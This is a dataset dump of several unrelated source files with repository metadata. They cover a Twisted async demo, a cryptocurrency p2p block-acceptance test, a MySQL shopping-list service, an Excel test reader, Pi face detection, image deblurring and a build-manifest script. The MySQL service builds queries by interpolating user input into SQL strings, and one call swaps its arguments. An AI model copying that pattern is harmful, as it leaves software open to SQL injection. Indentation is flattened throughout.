print("Done", arg)
def all_done(arg):
print("All done", arg)
print("Stop reactor")
reactor.stop()
def defer_task(i):
print("Start", i)
return task.deferLater(reactor, 2, done, i)
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addBoth(all_done)
# dfds.addCallback(all_done)
# reactor.callLater(5, stop)
reactor.run()
def demo_treq_get(url):
def get_done(response):
print("get response:", response)
reactor.stop()
treq.get(url).addCallback(get_done)
reactor.run()
def main():
@defer.inlineCallbacks
def my_task1():
print("Start task1")
url = "http://www.baidu.com"
d = treq.get(url.encode('utf-8'))
d.addCallback(parse)
yield d
def my_task2():
print("Start task2")
return task.deferLater(reactor, 2, parse, "200")
@defer.inlineCallbacks # need use `yield`
def my_task3():
print("Start task3")
yield task.deferLater(reactor, 2, parse, "400")
def parse(response):
print("parse response:", response)
def all_done(arg):
print("All done", arg)
reactor.stop()
dfds = defer.DeferredList([my_task1(), my_task2(), my_task3(), ])
dfds.addBoth(all_done)
reactor.run()
if __name__ == "__main__":
# demo_defer1()
# demo_defer2()
# demo_defer3()
# demo_defer4()
# demo_defer5()
# demo_reactor1()
# demo_reactor2()
# demo_reactor3()
# demo_treq_get('http://www.baidu.com')
main()
|
[
"chenjin.zero@163.com"
] |
chenjin.zero@163.com
|
d6b7f74c1a8958d8c0d2b441c408b1a559b1d5a0
|
1d21b7bc9205c9c2acd8b8fd8ee75dec93e974d4
|
/qa/rpc-tests/p2p-acceptblock.py
|
db03aff39949a8e3e99ec7b3f0a24f9f5da34678
|
[
"MIT"
] |
permissive
|
ZioFabry/LINC2
|
494d12be6034b7f5999960e3f3ed62f154be7ab8
|
a2e0e06cf68771a82bb1d4da30e0c914c8589bbe
|
refs/heads/master
| 2020-05-22T18:28:27.590171
| 2019-05-13T19:51:49
| 2019-05-13T19:51:49
| 186,471,965
| 0
| 0
|
MIT
| 2019-05-13T18:10:28
| 2019-05-13T18:10:27
| null |
UTF-8
|
Python
| false
| false
| 12,328
|
py
|
#!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class AcceptBlockTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LINCD", "lincd"),
help="bitcoind binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
binary=self.options.testbinary))
self.nodes.append(start_node(1, self.options.tmpdir,
["-debug", "-whitelist=127.0.0.1"],
binary=self.options.testbinary))
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = TestNode() # connects to node0 (not whitelisted)
white_node = TestNode() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int ("0x" + n.getbestblockhash() + "L", 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in xrange(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
print "First height 2 block accepted by both nodes"
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in xrange(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
print "Second height 2 block accepted only from whitelisted peer"
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in xrange(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
try:
self.nodes[0].getblock(blocks_h3[0].hash)
print "Unrequested more-work block accepted from non-whitelisted peer"
except:
raise AssertionError("Unrequested more work block was not processed")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
print "Successfully reorged to length 3 chain from whitelisted peer"
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in xrange(2):
for i in xrange(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
for x in all_blocks:
try:
self.nodes[0].getblock(x.hash)
if x == all_blocks[287]:
raise AssertionError("Unrequested block too far-ahead should have been ignored")
except:
if x == all_blocks[287]:
print "Unrequested block too far-ahead not processed"
else:
raise AssertionError("Unrequested block with more work should have been accepted")
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
try:
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
print "Unrequested block far ahead of tip accepted from whitelisted peer"
except:
raise AssertionError("Unrequested block from whitelisted peer not accepted")
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
print "Unrequested block that would complete more-work chain was ignored"
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_getdata = None
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_getdata
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
print "Inv at tip triggered getdata for unprocessed block"
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
print "Successfully reorged to longer chain from non-whitelisted peer"
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
|
[
"root@vultr.guest"
] |
root@vultr.guest
|
7b4c48f9072d0d8d3c8bdefc2ff22386e5ca805f
|
c68f8159b2f396d0718f71a1e0eb3fa31058b62f
|
/analytics/urls.py
|
a434fda5659c24a2cdfc3e1b3d2fa7a23578504a
|
[] |
no_license
|
hamideshoun/url_shortener
|
ed5c20018db385cf384cc4fcca691db7d025cdd0
|
27fb116d20662c349edfaa89dbc59a798819ff68
|
refs/heads/master
| 2023-06-14T12:54:07.283495
| 2021-07-08T00:50:18
| 2021-07-08T00:50:18
| 383,959,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
from django.urls import path
from analytics.views import ReportAPIView
urlpatterns = [
path('reports/', ReportAPIView.as_view()),
]
|
[
"hamid.naraghi@gmail.com"
] |
hamid.naraghi@gmail.com
|
ad04ab061a5956176bed1dea790659a21862a6d9
|
81e40b229182662606ba521c60386790b4163d10
|
/shopping-elf/data-microservice/processed_data_service.py
|
78852c22d17b3dce1c926f04b902b31d5a77178a
|
[] |
no_license
|
neilthaker07/Shopping-Elf
|
64e1dc23b012cac4969bfded1c569b1a2e4818df
|
dd214503b240dc4092d1c7d2244bca1a37a1f357
|
refs/heads/master
| 2020-05-31T21:35:11.600984
| 2017-05-21T17:41:21
| 2017-05-21T17:41:21
| 94,049,664
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,867
|
py
|
import mysql.connector
from Models import ShoppingItems
from Models import ShoppingList
import collections
import DbConstants
def getShoppingList(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name,DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),days,quantity,ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY))) as last FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(ShoppingItems(each_row[0],each_row[1],each_row[2],each_row[3],each_row[4]));
cur.close()
db.close()
return formatShoppingData(shoppingList);
def getShoppingListProducts(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(each_row[0]);
cur.close()
db.close()
return shoppingList;
def getProductConsumption(userid,product_name):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),bill_date, qty FROM shopping_elf.receipt_data where product_name='%s' and userid= '%s'"
cur.execute(query %(userid,product_name) )
rows=cur.fetchall()
sList = [];
for each_row in rows:
d = collections.OrderedDict()
d['date'] = each_row[0];
d['quantity'] = each_row[1];
sList.append(d)
cur.close()
db.close()
return sList;
def getNotificationData():
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "select i.user_id,u.user_api_key, i.product_name from shopping_elf.inventory i , shopping_elf.`user` u where DATEDIFF(NOW(),invoice_date) +1 = days and u.username=i.user_id order by user_id"
cur.execute(query)
rows=cur.fetchall()
notificationsList=collections.OrderedDict()
for each_row in rows:
if(each_row[1] in notificationsList):
productList = notificationsList[each_row[1]]
productList.append(each_row[2])
else:
productList=[]
productList.append(each_row[2])
notificationsList[each_row[1]] =productList
cur.close()
db.close()
return notificationsList;
def formatShoppingData(shoppingList):
sList =[];
for eachData in shoppingList:
d = collections.OrderedDict()
d['productName'] = eachData.productName; # its agent id
d['lastBilldate'] = eachData.billDate;
d['estimate_days'] = eachData.estimate_days;
d['quantity'] = eachData.quantity;
d['estimated_days_to_last'] = eachData.estimated_days_to_last;
sList.append(d)
return sList;
|
[
"rashmishrm74@gmail.com"
] |
rashmishrm74@gmail.com
|
c93c5ccd6c588a6c7f2b024b62acc6badd12163b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/HDGiiCmSgJeeu3388_19.py
|
09b87a15f58f460743f3b6ef6eaacc88c698ba44
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 904
|
py
|
"""
A fuse melts when a current in an electrical device exceeds the fuse's rating,
breaking the circuit and preventing the heat from building up too much (which
can cause a fire). The ideal fuse to choose is **higher** than the device's
current output, yet **as close as possible** to it as well.
Given a list of _fuse ratings_ , and the _device's current output_ , return
which of the fuses is the best for the device.
### Examples
choose_fuse(["3V", "5V", "12V"], "4.5V") ➞ "5V"
choose_fuse(["5V", "14V", "2V"], "5.5V") ➞ "14V"
choose_fuse(["17V", "15V", "12V"], "9V") ➞ "12V"
### Notes
* You will be given three possible ratings in voltage.
* Fuses may not be in a sorted order.
* Assume that there is a valid fuse in every test case
"""
def choose_fuse(f, c):
f = [int(e[:-1]) for e in f if float(e[:-1]) >= float(c[:-1])]
return str(min(f))+'V'
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
7416cbc73d6ba31ae6410ac8ec422a06a219270e
|
4ca5ad12b083ed7dd8d5132bc9e66d4dea326dda
|
/WebClass/web_11_自动化测试框架V1/common/handle_excel.py
|
a06471baff2cf97acf86513f147a3ab66d7e499b
|
[] |
no_license
|
ybsgithup/Code
|
7b279f68d96908f2ae44d21e3da335110bc308e4
|
bbc2018e6a7ce7293c5effb409d7a6279033ae15
|
refs/heads/master
| 2022-11-23T23:02:48.908126
| 2020-07-27T04:24:38
| 2020-07-27T04:24:38
| 276,266,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,465
|
py
|
import os
from openpyxl import load_workbook
class Testcase:
pass
class HandleExcel:
def __init__(self, filename, sheetname=None):
self.filename = filename
self.sheetname = sheetname
def read_data(self):
"""
读数据
:return:
"""
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
testcases_list = []
headers_list = [] # 存放表头信息
for row in range(1, ws.max_row + 1):
# 存放每一行的用例数据
# one_row_dict = {}
one_testcase = Testcase() # 创建用例对象
for column in range(1, ws.max_column + 1):
one_cell_value = ws.cell(row, column).value
if row == 1:
# headers_list.append(one_cell_value)
# 将获取的表头,转化为字符串并添加至headers_list中
headers_list.append(str(one_cell_value))
else:
# 获取表头字符串数据
key = headers_list[column - 1]
# one_row_dict[key] = one_cell_value
if key == "actual":
# 设置存放实际响应报文所在列的列号actual_column属性
setattr(one_testcase, "actual_column", column)
elif key == "result":
# 设置存放用例执行结果所在列的列号result_column属性
setattr(one_testcase, "result_column", column)
setattr(one_testcase, key, one_cell_value)
if row != 1:
# testcases_list.append(one_row_dict)
# 设置当前用例所在的行号row属性
setattr(one_testcase, "row", row)
testcases_list.append(one_testcase)
return testcases_list
'''
def write_data(self, row, column, data):
"""
写操作
:param row: 指定在某一行写
:param column: 指定在某一列写
:param data: 待写入的数据
:return:
"""
# 将数据写入到excel中,不能与读取操作公用一个Workbook对象
# 如果使用同一个Workbook对象,只能将最后一次写入成功,会出现意想不到的结果
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
# 第一种写入方式:
# one_cell = ws.cell(row, column)
# one_cell.value = data
# 第二种写入方式:
ws.cell(row, column, value=data)
wb.save(self.filename)
'''
def write_data(self, one_testcase, actual_value, result_value):
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
# 第二种写入方式:
ws.cell(one_testcase.row, one_testcase.actual_column, value=actual_value)
ws.cell(one_testcase.row, one_testcase.result_column, value=result_value)
wb.save(self.filename)
if __name__ == '__main__':
excel_filename = "../data/test_case.xlsx"
sheet_name = "cases_error"
do_excel = HandleExcel(excel_filename, sheet_name)
do_excel.read_data()
pass
|
[
"ybsfile@163.com"
] |
ybsfile@163.com
|
794d7b71c405e3df9b2868475614e966c73424c3
|
d6a752aefedf14439236017f2de98e5d40823f57
|
/bb2-07-05-face.py
|
b5cb5a5b17b2af28c03e731f69654c3e271a7e43
|
[] |
no_license
|
norihisayamada/opencv_bluebacks
|
918b243f178f4170f64a181e5d7dca262d6b85b4
|
df2cfadadc3f7a66eeb9784aa9427aa5cacd61b5
|
refs/heads/master
| 2022-11-12T02:10:09.345084
| 2020-07-10T03:02:36
| 2020-07-10T03:02:36
| 278,521,091
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,618
|
py
|
# -*- coding: utf-8 -*-
import picamera
import picamera.array
import cv2
cascade_path = "/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml"
cascade = cv2.CascadeClassifier(cascade_path)
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as stream:
camera.resolution = (320, 240)
camera.framerate = 15
while True:
# stream.arrayにBGRの順で映像データを格納
camera.capture(stream, 'bgr', use_video_port=True)
# 映像データをグレースケール画像grayに変換
gray = cv2.cvtColor(stream.array, cv2.COLOR_BGR2GRAY)
# grayから顔を探す
facerect = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(30,30), maxSize=(150,150))
if len(facerect) > 0:
for rect in facerect:
# 元の画像(system.array)の顔がある位置赤い四角を描画
# rect[0:2]:長方形の左上の座標, rect[2:4]:長方形の横と高さ
# rect[0:2]+rect[2:4]:長方形の右下の座標
cv2.rectangle(stream.array, tuple(rect[0:2]),tuple(rect[0:2]+rect[2:4]), (0,0,255), thickness=2)
# system.arrayをウインドウに表示
cv2.imshow('frame', stream.array)
# "q"を入力でアプリケーション終了
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# streamをリセット
stream.seek(0)
stream.truncate()
cv2.destroyAllWindows()
|
[
"sus444norihisa@gmail.com"
] |
sus444norihisa@gmail.com
|
d8595f38931efaebad9121c07fafd55b564816a1
|
8be96a7791e50165b8849e69b1cf6a04869f2400
|
/run.py
|
58b06c7a845124aa433ff1a33ae2569c92e3b3e8
|
[] |
no_license
|
nosoccus/department-app
|
458b38387571d7dead37ff87b8dfda91cd0717fb
|
f822d1e05db5d869ab583a3a93e9e58d9100022a
|
refs/heads/main
| 2023-01-29T18:42:37.975524
| 2020-12-14T23:26:56
| 2020-12-14T23:26:56
| 317,921,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
import app
if __name__ == "__main__":
app.create_app().run(debug=True)
|
[
"rostyk.holoven@gmail.com"
] |
rostyk.holoven@gmail.com
|
c98bf9af78911012a5d580d8fab568dc0dd4d262
|
5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8
|
/client/gui_lib/GUIElement.py
|
9e1b3576bea5c0ed0b0177d38d061da26e549710
|
[] |
no_license
|
sheepsy90/survive
|
26495f1ff2d8247fbb9470882f8be9f5272e7f2c
|
0eddf637be0eacd34415761b78fc2c9d50bc1528
|
refs/heads/master
| 2021-01-09T05:55:16.546762
| 2017-02-03T20:15:28
| 2017-02-03T20:15:28
| 80,864,391
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,463
|
py
|
import pygame
class GUIElement(object):
TEXT = 2
BUTTON = 1
def __init__(self, name, rect):
self.name = name
self.x, self.y, self.width, self.height = rect
self.is_hover = False
self.gui_handler = None
self.focus = False
self.visible = True
self.z_order = 0
self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)
def set_zorder(self, order):
self.z_order = order
def get_zorder(self):
return self.z_order
def get_name(self):
return self.name
def set_hover_state(self, mx, my):
if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
self.is_hover = True
else:
self.is_hover = False
def update(self, mx, my, mouse_buttons, events):
self.set_hover_state(mx, my)
def get_rect(self):
return pygame.Rect(self.x, self.y, self.width, self.height)
def is_hover_active(self):
return self.is_hover
def draw(self, renderer):
raise NotImplementedError
def register_gui_handler(self, gui_handler):
self.gui_handler = gui_handler
def enable_focus(self):
self.focus = True
def disable_focus(self):
self.focus = False
def has_focus(self):
return self.focus
def set_visible(self, value):
self.visible = value
def is_visible(self):
return self.visible
|
[
"robert.kessler@klarna.com"
] |
robert.kessler@klarna.com
|
0f30f9125763d9b2ac1d7dec0a5bd1a1859b038b
|
01341e6b4e13679f3a78bd02f7156cb52d11d8d8
|
/utils_fourier.py
|
6f311983041114e5ad36b3ca37ad29ee24dfbbf4
|
[
"MIT"
] |
permissive
|
majedelhelou/PriorLearning
|
864b1499ac993b730b90e3b700b3d59795865818
|
f66d25993c3b99dd31d9d62abeb3e0a5623e034d
|
refs/heads/master
| 2020-09-13T09:22:45.011770
| 2020-01-11T23:50:10
| 2020-01-11T23:50:10
| 222,724,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
from utils_deblur import psf2otf, otf2psf
import numpy as np
def deblurring_estimate(Y, X_l, k_l, reg_weight=1):
'''
Operation: solve for Z that minimizes: ||Y-k_l*Z||**2 + reg_weight * ||Z-X_l||**2
Inputs:
2D images Y and X_l (Gray or multichannel)
k_l (blur kernel for the low-res image, should be normalized to 1)
reg_weight (weight of the reg term ||Z-X_l||**2)
Outputs:
Z image that minimizes the optimization loss
'''
# Convert inputs to Fourier domain
X_l_Freq = np.fft.fft2(X_l, axes=[0, 1])
Y_Freq = np.fft.fft2(Y, axes=[0, 1])
k_l_Freq = psf2otf(k_l, Y.shape[:2])
if X_l_Freq.ndim == 3:
k_l_Freq = np.repeat(k_l_Freq[:, :, np.newaxis], X_l_Freq.shape[2], axis=2)
# Solve for k in Fourier domain (regularization only affects den)
num = k_l_Freq.conjugate() * Y_Freq + reg_weight * X_l_Freq
den = np.abs(k_l_Freq)**2 + reg_weight # Fourier transform of k_l transpose * k_l + reg_weight
Z_Freq = num / den
# Convert back to spatial, given the width
Z = np.real(np.fft.ifft2(Z_Freq, axes=(0, 1)))
return Z
|
[
"elhelou@iccluster047.iccluster.epfl.ch"
] |
elhelou@iccluster047.iccluster.epfl.ch
|
898c24a3febc9ddd599cab942912e2123013e61b
|
b857011826feae5dc8b68083b30e589e8179789f
|
/build-from-manifest/build_from_manifest.py
|
f046c52558dc31dec421ec2d650a7c52d92d19e4
|
[] |
no_license
|
minddrive/build-tools
|
934d862851989d80eb2eb0746e160ac571e09261
|
83a7af0bc6679c3d461d3b4f3edfad5e47ec9f74
|
refs/heads/master
| 2020-03-27T02:17:28.657669
| 2018-08-31T03:03:00
| 2018-08-31T03:03:00
| 145,779,487
| 0
| 0
| null | 2018-08-23T00:47:16
| 2018-08-23T00:47:16
| null |
UTF-8
|
Python
| false
| false
| 22,754
|
py
|
#!/usr/bin/env python3.6
"""
Program to generate build information along with a source tarball
for building when any additional changes have happened for a given
input build manifest
"""
import argparse
import contextlib
import gzip
import json
import os
import os.path
import pathlib
import shutil
import sys
import tarfile
import time
import xml.etree.ElementTree as EleTree
from datetime import datetime
from pathlib import Path
from subprocess import PIPE, run
from typing import Union
# Context manager for handling a given set of code/commands
# being run from a given directory on the filesystem
@contextlib.contextmanager
def pushd(new_dir):
old_dir = os.getcwd()
os.chdir(new_dir)
try:
yield
finally:
os.chdir(old_dir)
# Save current path for program
script_dir = os.path.dirname(os.path.realpath(__file__))
class ManifestBuilder:
"""
Handle creating a new manifest from a given input manifest,
along with other files needed for a new build
"""
# Files to be generated
output_filenames = [
'build.properties',
'build-properties.json',
'build-manifest.xml',
'source.tar',
'source.tar.gz',
'CHANGELOG'
]
def __init__(self, args):
"""
Initialize from the arguments and set up a set of additional
attributes for handling key data
"""
self.manifest = pathlib.Path(args.manifest)
self.manifest_project = args.manifest_project
self.build_manifests_org = args.build_manifests_org
self.force = args.force
self.push = not args.no_push
self.output_files = dict()
self.product = None
self.manifest_path = None
self.input_manifest = None
self.manifests = None
self.product_config = None
self.manifest_config = None
self.product_branch = None
self.start_build = None
self.type = None
self.parent = None
self.parent_branch = None
self.build_job = None
self.build_manifest_filename = None
self.branch_exists = 0
self.version = None
self.release = None
self.last_build_num = 0
self.build_num = None
def prepare_files(self):
"""
For the set of files to be generated, ensure any current
versions of them in the filesystem are removed, and keep
track of them via a dictionary
"""
for name in self.output_filenames:
output_file = pathlib.Path(name)
if output_file.exists():
output_file.unlink()
self.output_files[name] = output_file
def determine_product_info(self):
"""
Determine the product and manifest path from the given
input manifest
"""
path_parts = self.manifest.parts
base, rest = path_parts[0], self.manifest.relative_to(path_parts[0])
if len(path_parts) == 1:
# For legacy reasons, 'top-level' manifests
# are couchbase-server
self.product = 'couchbase-server'
self.manifest_path = base
elif base == 'cbdeps':
# Handle cbdeps projects specially
path_parts = rest.parts
self.product = f'cbdeps/{path_parts[0]}'
self.manifest_path = rest.relative_to(path_parts[0])
else:
self.product = base
self.manifest_path = rest
@staticmethod
def update_manifest_repo():
"""
Update the manifest repository
"""
print('Updating manifest repository...')
run(['git', 'fetch', '--all'], check=True)
run(['git', 'checkout', '-B', 'master', 'origin/master'], check=True)
def parse_manifest(self):
"""
Parse the input manifest (via xml.ElementTree)
"""
if not self.manifest.exists():
print(f'Manifest "{self.manifest}" does not exist!')
sys.exit(3)
self.input_manifest = EleTree.parse(self.manifest)
def get_product_and_manifest_config(self):
"""
Determine product config information related to input manifest,
along with the specific manifest information as well
"""
config_name = pathlib.Path(self.product) / 'product-config.json'
try:
with open(config_name) as fh:
self.product_config = json.load(fh)
except FileNotFoundError:
self.product_config = dict()
# Override product if set in product-config.json
self.product = self.product_config.get('product', self.product)
self.manifests = self.product_config.get('manifests', dict())
self.manifest_config = self.manifests.get(str(self.manifest), dict())
def do_manifest_stuff(self):
"""
Handle the various manifest tasks:
- Clone the manifest repository if it's not already there
- Update the manifest repository to latest revision
- Parse the manifest and gather product and manfiest config
information
"""
manifest_dir = pathlib.Path('manifest')
if not manifest_dir.exists():
run(['git', 'clone', self.manifest_project, 'manifest'],
check=True)
with pushd(manifest_dir):
self.update_manifest_repo()
self.parse_manifest()
self.get_product_and_manifest_config()
def update_submodules(self, module_projects):
"""
Update all existing submodules for given repo sync
"""
module_projects_dir = pathlib.Path('module_projects')
if not module_projects_dir.exists():
module_projects_dir.mkdir()
with pushd(module_projects_dir):
print('"module_projects" is set, updating manifest...')
# The following really should be importable as a module
run(
[f'{script_dir}/update_manifest_from_modules']
+ module_projects, check=True
)
